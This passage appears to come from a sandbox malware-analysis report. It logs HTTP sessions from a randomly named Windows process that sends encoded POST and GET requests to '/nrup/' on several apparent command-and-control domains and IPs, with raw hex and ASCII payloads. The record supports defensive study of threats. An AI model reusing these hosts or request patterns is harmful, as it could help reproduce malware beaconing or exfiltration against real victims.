JcMqMpX9bcCjrxrFJx4IIbeAAwjygYBpBryW8iFn259hD02Fb6ckEIAE4VPVYWcqsN98CNNB5xXeujeceDvGXhvqrZQsuv3dYjoOd2FvURcg7vNN+WaevCPw2g4C5MRWpb3EVLDU4AHQIRnyDoJJNWS2fkaOTbdpiEB4WT72QAYQ4pRVUMMm [TRUNCATED]
May 3, 2024 11:35:23.395225048 CEST	1586	OUT	Data Raw: 50 30 5a 30 6d 46 2b 62 4f 6c 36 56 6b 6a 52 37 74 74 76 79 78 43 4c 39 59 32 55 61 4d 2f 44 34 47 48 52 39 68 65 61 2b 4c 55 54 37 2f 58 4d 4e 6f 72 61 73 72 61 70 4c 33 4f 59 64 34 72 7a 41 49 46 56 65 61 68 39 6f 79 75 78 68 6b 2b 45 64 54 4b Data Ascii: P0Z0mF+bOl6VkjR7ttvyxCL9Y2UaM/D4GHR9hea+LUT7/XMNorasrapL3OYd4rzAIFVeah9oyuxhk+EdTK3u8tcNsP5lFO/nneeK0lRuiA7m9Vsok/MvJu4frw0QSmwc2+NFzAh4p3dHjD1WDUp9MBcjOZmvQmddDGHzmmt1JHpMeUZx4Gn+xRJukoX/HXbSSD/VbAPbpJKUpV1c8S06p3AlNL20xbf/3i2JBjlpB6xLFs74zwG
May 3, 2024 11:35:23.678255081 CEST	213	IN	HTTP/1.1 404 Not Found Date: Fri, 03 May 2024 09:35:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: Apache Content-Encoding: gzip Data Raw: 32 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 51 74 f1 77 0e 89 0c 70 55 c8 28 c9 cd b1 e3 02 00 00 00 ff ff 0d 0a Data Ascii: 20QtwpU(
May 3, 2024 11:35:23.678276062 CEST	36	IN	Data Raw: 37 0d 0a e2 02 00 00 00 ff ff 0d 0a 37 0d 0a e2 02 00 00 00 ff ff 0d 0a 37 0d 0a e2 02 00 00 00 ff ff 0d 0a Data Ascii: 777
May 3, 2024 11:35:23.678366899 CEST	148	IN	Data Raw: 38 65 0d 0a 54 8c c1 0e 82 30 10 44 ef 7c 45 d3 b3 3d 78 f3 c0 92 18 e3 c1 0f 30 f1 ba b6 23 dd a4 2d 08 0b fc be 60 62 82 b7 37 99 79 53 d5 1b 9a c4 a5 25 8b 62 9b ca 98 3a 82 c3 06 2b 66 28 1b 1f 79 18 a1 64 27 7d b9 93 dd 57 51 b5 77 78 4f 32 Data Ascii: 8eT0D\|E=x0#-`b7yS%b:+f(yd'}WQwxO2}]3EYZ3)`#ET8sG*\|
May 3, 2024 11:35:23.678406000 CEST	191	IN	Data Raw: 37 63 0d 0a 64 90 b1 0e c2 30 0c 44 67 f8 8a 28 3b b8 48 1d 53 36 3e 24 4d 8c 12 61 5a 64 5b d0 fe 3d 0e 19 99 4e 77 96 7c a7 77 63 5e d9 8d c3 18 a0 07 c7 43 a0 ba 3c 5c 61 bc 4f 1e 72 d4 08 8a cf 17 45 45 81 0f ce 20 6a 1b 93 c9 4e 78 4e 22 de Data Ascii: 7cd0Dg(;HS6>$MaZd[=Nw\|wc^C<\aOrEE jNxN"1^vIyIo(yjc]};+n(25rtQpjhgTSnqIQ~^:D/d{Z
May 3, 2024 11:35:23.678500891 CEST	165	IN	Data Raw: 31 65 0d 0a f2 f3 0f 51 70 f3 0f f5 73 41 d6 01 a3 30 f4 a5 a4 16 27 a3 7a 02 14 aa 00 00 00 00 ff ff 0d 0a 31 37 0d 0a b2 29 b0 0b c9 48 05 06 48 61 69 6a 71 89 82 4d 92 1d 00 00 00 ff ff 0d 0a 33 33 0d 0a d2 cf 2b 2a 2d d0 b7 d1 4f b2 53 28 4f Data Ascii: 1eQpsA0'z17)HHaijqM33+-OS(O,V/QH/KQS(,V(N-K-/11ZIma%:F~0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.22	49205	46.242.239.47	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:35:25.894742012 CEST	473	OUT	GET /nrup/?pX6dR=cS0qtSAcX+pXbswFa2DQEUpgU+gsiJIsBUXhui9hTGS1u1fOXkoxFo6mlimfKNBB7XQLeoIRuez0ccXxIjo/0bdL2EvMrJzvcKQzHXpuK09s74lteTxOQbEHYjk7&tv=6TdD8B HTTP/1.1 Host: www.domprojekt.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
May 3, 2024 11:35:26.128945112 CEST	818	IN	HTTP/1.1 404 Not Found Date: Fri, 03 May 2024 09:35:26 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: Apache Accept-Ranges: bytes Data Raw: 32 37 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 0a 0a 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 64 61 74 61 2f 74 65 6d 70 6c 61 74 65 73 2f 77 65 62 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 [TRUNCATED] Data Ascii: 27e<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Error 404</title><link href="/data/templates/web/static/style.css" rel="stylesheet"> </head><body><div class="error-container"><div class="error-text"><h1>CLIENT ERROR</h1></div><div class="error-text-strong"><h1>404</h1></div><div class="error-text"><h1>NOT FOUND</h1></div></div><div class="error-descr-container"> <p>The request <b>/nrup/</b> was not found on this server.</p></div> </body></html>
May 3, 2024 11:35:26.128957987 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.22	49206	208.91.197.27	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:35:31.351697922 CEST	2578	OUT	POST /nrup/ HTTP/1.1 Host: www.northeastcol0r.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.northeastcol0r.com Connection: close Content-Length: 2162 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.northeastcol0r.com/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 74 69 59 30 68 48 6f 42 78 42 50 69 61 4c 49 4a 55 35 71 62 2f 58 75 6a 34 38 78 48 74 50 4b 41 6d 6c 48 6f 54 4a 74 43 34 76 43 51 4a 36 37 57 69 45 56 47 68 71 61 6d 79 36 39 74 32 6a 46 61 42 45 46 54 72 76 4d 38 32 78 73 43 4d 45 68 2b 2f 74 61 52 66 4c 64 54 65 53 4a 33 4f 4b 48 2f 6b 64 41 6d 72 41 30 7a 54 70 59 51 31 47 66 67 6d 2b 64 2f 67 61 6a 4a 31 76 37 49 43 32 31 68 30 46 34 47 69 5a 76 62 2b 6d 6d 33 36 59 41 59 71 6a 30 31 55 47 64 54 66 2b 2b 38 36 6c 68 6b 2b 36 56 52 44 30 51 5a 62 4c 79 58 58 68 58 6a 62 6f 63 65 30 2b 5a 66 2b 6c 43 6f 39 2b 4b 52 31 55 51 4e 77 30 59 54 64 6a 69 6a 79 32 2b 71 6f 37 77 31 46 61 78 68 6a 55 46 33 53 34 55 33 32 32 69 56 61 79 49 72 5a 34 59 45 63 76 46 32 4a 78 4b 48 6e 71 6a 4b 65 64 42 58 4f 4a 61 41 6d 53 4b 49 71 46 59 79 6a 55 45 47 39 4e 6d 6f 51 32 2b 46 58 4c 4a 48 41 4a 4b 79 75 33 4c 49 47 69 4c 30 70 6a 46 74 53 52 49 6c 31 78 61 74 34 78 45 71 46 55 70 49 4c 4f 4b 6b 75 51 49 55 66 36 71 5a 44 50 51 6f 45 45 52 45 [TRUNCATED] Data Ascii: pX6dR=tiY0hHoBxBPiaLIJU5qb/Xuj48xHtPKAmlHoTJtC4vCQJ67WiEVGhqamy69t2jFaBEFTrvM82xsCMEh+/taRfLdTeSJ3OKH/kdAmrA0zTpYQ1Gfgm+d/gajJ1v7IC21h0F4GiZvb+mm36YAYqj01UGdTf++86lhk+6VRD0QZbLyXXhXjboce0+Zf+lCo9+KR1UQNw0YTdjijy2+qo7w1FaxhjUF3S4U322iVayIrZ4YEcvF2JxKHnqjKedBXOJaAmSKIqFYyjUEG9NmoQ2+FXLJHAJKyu3LIGiL0pjFtSRIl1xat4xEqFUpILOKkuQIUf6qZDPQoEERElu2lvDcN0jt7zZQCseDBosHNTrJ3J/ddpQnOLGF5x2Mn2bGqR1VKoypsGJfZuaHlYwTnWEtm11Tz27eAe0KwQ9qV8vJCs+naeeX8L8ex53qUZOYO3THlcw/deCzbtC1gCvj4xJlwPtKVyvnZxMel2Tm6OQXKVrVyrCKrWO0MZfshYe9y3Qs+b1/NlnIJDUv81eo4uEM7cu20AjE61FzDBtTvAviT2S0AHw3zprofq6eqWg5cZhsk3zzSsold7UEhyayE6gappjPJr9T6nCemcBwZdhgFFuZ08ROpnV58a3A4BuhNjb7PuxkVi7OJAD+Gt9Xbos/KhEoV3jc8wsuLIv4+LeiephCKtopxls48O5LG36DNi2jW13h0O2tLkA6+KPcAubDnJQMLaBAKwEJgJvaUMFUi2SvGRnKQlyHalWFIoku8yyxAKjMFaeohDWGs6auKGaprkC9eUAcz66Wm75ed8bq/xu/Fy4EJkSt/xZ0xB3s5YPZG+CVg2rwg6UUerD1J2cOhLBWIS2NVswMh1XAQNiPwwKUId7/inFI90X2MWnMXpNlNS3dBFLCbvM5HYaAa1mwwZzNmsadtbW/4NA2qgR5D4dRLRn+f9sRciMCnS1r51OVtCzx2YextFWMnSCupE3OfXtOVy7YFvuiLE0+//+mHCkJnKL [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.22	49207	208.91.197.27	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:35:33.955884933 CEST	751	OUT	POST /nrup/ HTTP/1.1 Host: www.northeastcol0r.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.northeastcol0r.com Connection: close Content-Length: 202 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.northeastcol0r.com/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 74 69 59 30 68 48 6f 42 78 42 50 69 61 49 51 4a 47 34 71 62 2b 33 75 6a 31 63 78 48 37 2f 4b 38 6d 6c 43 49 54 4e 30 48 34 63 69 51 4d 2f 66 57 6a 79 42 47 6d 71 61 35 71 4b 38 6b 79 6a 46 4c 42 45 46 6c 72 71 73 38 32 77 49 43 4e 6d 4a 2b 71 35 4f 51 58 62 64 52 48 43 4a 79 4f 4b 4c 4d 6b 64 64 6a 72 42 51 7a 54 75 38 51 6e 57 76 67 77 37 42 2f 6c 71 6a 50 7a 76 37 62 43 32 78 4f 30 46 70 4b 69 59 54 62 39 54 47 33 35 4e 4d 59 76 30 59 31 50 57 64 65 53 65 2b 6f 38 47 77 34 6d 72 35 45 45 33 30 67 57 50 75 61 57 57 7a 6d 54 4c 6b 57 69 4c 64 6b 39 42 2f 34 78 4e 2b 64 6e 77 3d 3d Data Ascii: pX6dR=tiY0hHoBxBPiaIQJG4qb+3uj1cxH7/K8mlCITN0H4ciQM/fWjyBGmqa5qK8kyjFLBEFlrqs82wICNmJ+q5OQXbdRHCJyOKLMkddjrBQzTu8QnWvgw7B/lqjPzv7bC2xO0FpKiYTb9TG35NMYv0Y1PWdeSe+o8Gw4mr5EE30gWPuaWWzmTLkWiLdk9B/4xN+dnw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.22	49208	208.91.197.27	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:35:36.653150082 CEST	2440	OUT	POST /nrup/ HTTP/1.1 Host: www.northeastcol0r.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.northeastcol0r.com Connection: close Content-Length: 3626 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.northeastcol0r.com/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 74 69 59 30 68 48 6f 42 78 42 50 69 62 6f 41 4a 56 76 32 62 79 48 75 67 36 38 78 48 74 50 4b 47 6d 6c 47 49 54 4a 74 43 34 75 4f 51 4a 38 33 57 69 55 56 47 67 71 61 35 73 4b 39 74 32 6a 46 64 42 45 52 44 72 76 49 47 32 7a 6b 43 4d 46 68 2b 2f 76 79 52 63 4c 64 54 52 79 4a 31 4f 4b 4b 55 6b 64 4e 6e 72 41 52 57 54 75 30 51 6e 45 58 67 68 72 42 38 71 4b 6a 50 7a 76 37 70 43 32 77 64 30 46 78 5a 69 64 32 65 2b 6d 4b 33 35 6f 41 59 6a 7a 30 79 62 6d 64 53 62 2b 2b 36 36 6c 74 7a 2b 36 56 56 44 31 30 2f 62 4c 32 58 57 33 44 6a 62 72 30 42 6f 2b 5a 59 77 46 43 6f 77 65 4b 54 31 55 51 52 77 30 59 54 64 6a 32 6a 7a 6d 2b 71 6f 2f 6b 30 47 71 78 68 72 30 45 6f 57 34 49 6b 32 32 33 32 61 78 52 57 4d 5a 4d 45 64 74 74 32 4e 42 4b 48 77 71 6a 4d 65 64 42 51 45 70 62 52 6d 54 6a 31 71 46 6f 69 6a 55 45 47 39 4f 75 6f 61 45 6d 46 52 62 4a 48 49 70 4b 78 68 58 4c 48 47 69 66 53 70 6a 5a 74 53 51 51 6c 31 47 57 74 73 44 73 70 4c 45 70 4a 50 4f 4b 6d 6b 41 4a 4a 66 36 33 30 44 50 59 47 45 48 5a 45 [TRUNCATED] Data Ascii: pX6dR=tiY0hHoBxBPiboAJVv2byHug68xHtPKGmlGITJtC4uOQJ83WiUVGgqa5sK9t2jFdBERDrvIG2zkCMFh+/vyRcLdTRyJ1OKKUkdNnrARWTu0QnEXghrB8qKjPzv7pC2wd0FxZid2e+mK35oAYjz0ybmdSb++66ltz+6VVD10/bL2XW3Djbr0Bo+ZYwFCoweKT1UQRw0YTdj2jzm+qo/k0Gqxhr0EoW4Ik2232axRWMZMEdtt2NBKHwqjMedBQEpbRmTj1qFoijUEG9OuoaEmFRbJHIpKxhXLHGifSpjZtSQQl1GWtsDspLEpJPOKmkAJJf630DPYGEHZElselum8N0Tt44JQGoeHkosOcTrFNJ9pdpALOOE94pmMbxbGacVV8oy9CGLXZvo3lKjLnRzBpzFT0y7fAHkLxQ9+N8u4ZsM/aM+X8IZyy1HqNUuYi9zGocw+5eG/lt3ZgCvT4x9FwPtKW5Pnb/ciL2T6+OQKPVoNyqS6rWP0MUfshAu845wtfb177ljZ8DnT819A4oH07dO2yTTE74lzNBtDvAry52WwAHQbzoP8fxKfCIQ4dZhsO3z3Wso1N7WghyYKE8hapkDPMp9T+wSeVcB5GdgdgFvh0zQupght8bXAmDuhNs77XuwNui+G3ABSGsMnbgs/NokoW1jc/7MvGIuI+Leuepg6Ktbxxhfg8BpLEz6DToWm313wPOyVbkHu+MOcApZ7kMQMNfBAAhUJMJvamMBYy3gnGRzWQjXrbtWFPx0ur9Sw/Kjc/aah8Clis6a+KBoBr4i9eUAc066Wi75bk8fnqxu/FgdwJlgF/pp0weHsccPYb+CZ82vcK6XAeqR9J2cOmUBWLKmNUswAW1XA6NiDwx7wIeM/ingc9jH2MRnMUgtlMS3ceFK+xvItHe7gaykozQjNlqacsV2i/NA6ygUBD7qxLQzif98Rc88CkKlq77uZxCztMYfhbGncnS1CpG0WcPNOQ/bYDvr79E0GN/7nyCn5nLr [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.22	49209	208.91.197.27	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:35:39.407793999 CEST	477	OUT	GET /nrup/?pX6dR=ggwUi3NE8XPYfrEyDYWF/0eo79hxseCGpDeyMd0GysDSfOPZ1SBHs6KFoNxq8E9UHwMkzvMMxi5vPk9k+MyKZrZ7RBl0G7n/meRcsnFLUeNExlbUnvd6pIbo3rGy&tv=6TdD8B HTTP/1.1 Host: www.northeastcol0r.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
May 3, 2024 11:35:42.228962898 CEST	536	IN	HTTP/1.1 200 OK Date: Fri, 03 May 2024 09:35:38 GMT Server: Apache Set-Cookie: vsid=925vr462274539211868053; expires=Wed, 02-May-2029 09:35:39 GMT; Max-Age=157680000; path=/; domain=www.northeastcol0r.com; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_cjJ2dC8gmInURElMZzgW0qckuq3o4JzU8rjOukt8fywhN77yFeGYaj2fI4DuWc8jUc99P19kJ+yYSnSbAdevuA== Content-Length: 2630 Content-Type: text/html; charset=UTF-8 Connection: close
May 3, 2024 11:35:42.228981972 CEST	648	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_cjJ2dC8gmInURElMZzgW0qckuq3o4JzU8rjOukt8fywhN77yFeGYaj2fI4DuWc8jUc99P19kJ+
May 3, 2024 11:35:42.229091883 CEST	1220	IN	Data Raw: 6c 65 2e 77 69 64 74 68 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6f 72 74 68 65 61 73 74 63 6f 6c 30 72 2e 63 6f 6d 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d 64 55 5a Data Ascii: le.width="0px";imglog.src="http://www.northeastcol0r.com/sk-logabpstatus.php?a=dUZzc3lpUllpUk5kaWtzQW1IYjlWcnkvMTR6NmV1Y24rZ0ZxRjVReWJXaWg1c3JOWVh1bmZPaDY3U2h0RjJ6TnpVWXd0aGdwWHlaWkhxMFd6eTZUdE9mNWxpeXAxSGVacEtOSzdVZEFFSll4aFVidUlXWUovVUJ5cjVN
May 3, 2024 11:35:42.229160070 CEST	762	IN	Data Raw: 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0d 0a 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 Data Ascii: ript type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.location.host + '/' + 'Skenzor7' + '/park.js?reg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.22	49210	172.67.145.66	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:35:51.589291096 CEST	2578	OUT	POST /nrup/ HTTP/1.1 Host: www.rtp7winbet.one Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.rtp7winbet.one Connection: close Content-Length: 2162 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.rtp7winbet.one/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 70 78 44 46 61 43 54 6d 51 4d 4e 70 2f 67 33 30 4f 68 48 4b 33 53 5a 52 42 38 71 53 6a 69 55 47 4f 67 75 51 35 4d 4c 52 67 48 54 46 50 61 4d 6b 68 52 37 53 59 69 61 70 47 63 6d 7a 45 77 46 6e 63 48 4d 49 32 39 31 6e 47 79 7a 49 71 6d 70 64 48 59 7a 57 6a 41 30 74 2b 38 79 4b 4c 75 34 54 75 6e 58 45 6d 71 45 68 62 49 5a 64 35 41 4f 54 6a 41 44 42 70 35 6f 34 53 73 77 5a 61 32 48 34 7a 47 62 55 34 79 76 39 63 48 54 59 70 73 67 75 65 66 2f 58 70 44 77 78 6c 45 4a 2b 5a 56 5a 59 42 6e 46 58 4d 71 35 78 6d 68 51 67 57 78 48 74 56 72 35 77 6f 54 65 6f 6f 59 39 78 69 70 4c 53 63 37 63 38 48 79 47 44 69 47 73 6b 69 69 49 35 4f 59 2f 39 68 48 39 63 38 75 68 76 50 69 6b 45 35 56 47 63 6c 6a 77 5a 62 50 6e 48 49 53 6a 78 75 65 74 6d 31 41 62 45 75 39 6c 6c 4e 72 53 57 79 77 41 56 4f 6d 6d 53 6a 37 48 4e 47 74 6f 50 72 63 53 61 68 76 52 36 4f 6a 62 47 44 36 58 46 6c 6f 50 67 77 76 55 43 73 79 4d 49 45 6f 67 31 7a 52 61 65 39 7a 66 63 55 36 68 2b 71 4c 5a 58 47 50 32 64 33 53 68 33 68 42 32 6f [TRUNCATED] Data Ascii: pX6dR=pxDFaCTmQMNp/g30OhHK3SZRB8qSjiUGOguQ5MLRgHTFPaMkhR7SYiapGcmzEwFncHMI291nGyzIqmpdHYzWjA0t+8yKLu4TunXEmqEhbIZd5AOTjADBp5o4SswZa2H4zGbU4yv9cHTYpsguef/XpDwxlEJ+ZVZYBnFXMq5xmhQgWxHtVr5woTeooY9xipLSc7c8HyGDiGskiiI5OY/9hH9c8uhvPikE5VGcljwZbPnHISjxuetm1AbEu9llNrSWywAVOmmSj7HNGtoPrcSahvR6OjbGD6XFloPgwvUCsyMIEog1zRae9zfcU6h+qLZXGP2d3Sh3hB2oKNKmvh315qwI0FwsmrIiOM8y0jn0Y4Az2/s2vGlw+BT4VK2hDwitR2+9pZEkxTKIe1iokzpjGc+mMXLfJLUPUsZcXi6BQSc9n79OrY/kur/twkg3+852NueNleG08t+9Mwn/IW00m7+F9Cr+I6Z7v+2AUzbBIWOxIZUaI3ujvKZQ42ATPoxpWCZF8bt8g/fb/CKKpVry5CxVOkCWqS25VCZTszDaZBsT2q91edKAhHU1If4K0l7ek0Do4iTnshtOlrEZh9lHTZjLxcoEySz3PjECVmwfxyHbasVfXl82fdJHi4v57iL5eA8CvWsS947OdZr94fsd8EWiU7uwRATyZHygFqEEO6M2eTXcq3q3gI1NBcjG5mwmL1JArCzq8CGDuQqdsOncnwHM+mdeCHYFD1rxXRvKd3nuhaL1QQqIc1bhlSuDJF5043HIDNBeYkgtaS+o6wQ0ZxR04k3GcLu8nQ5aRqy/9WeGBG+HdIwc0wXRIweXaOQdHr6nYg7pWYvRllewYdBlErpA0jBdY814qfxqlmaSqgNOLq1CElsD5EkK0FA0W/VbhONRUvTFrLXppv+EhYeN/TnFmwurotJdhKafBXGLKu6ByXd6sJGhhY637bMmJpMxzQhNMvWM0JvH2FVh0aI+iPgTeIjo8eI9AP5ePd4GOpfG5I [TRUNCATED]
May 3, 2024 11:35:51.677189112 CEST	122	OUT	Data Raw: 47 31 7a 4b 33 75 72 6d 76 5a 32 4c 6f 73 44 2b 63 48 38 50 32 48 53 52 62 43 70 75 36 58 6f 66 37 67 53 78 66 48 37 72 4b 38 4a 36 65 2b 47 69 61 37 31 42 65 68 51 6b 6b 6a 50 45 34 79 53 37 53 35 62 43 37 74 44 58 58 30 35 72 65 56 6d 37 47 50 Data Ascii: G1zK3urmvZ2LosD+cH8P2HSRbCpu6Xof7gSxfH7rK8J6e+Gia71BehQkkjPE4yS7S5bC7tDXX05reVm7GPr+4m2av6zGzrskIGxOdZFbUWVII6TFMd1JW6Hqq/
May 3, 2024 11:35:51.687238932 CEST	829	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 03 May 2024 09:35:51 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Fri, 03 May 2024 10:35:51 GMT Location: https://rtp7winbet.one Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2zliTf8fGlYtAv2tEN4DX51srw8AezZLYUbQYUK6ZxB7QeTUYEKL38ogjQL6ytDDhXw7qFRW7QeyNuYFGrhMDGRR2Dsh7U9UPjw9QgXzQNO5HaWyWDHBGRQnhcQjT2lasqlvssI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 87df436bbb9415af-EWR alt-svc: h2=":443"; ma=60 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.22	49211	172.67.145.66	80

Timestamp	Bytes transferred	Direction	Data
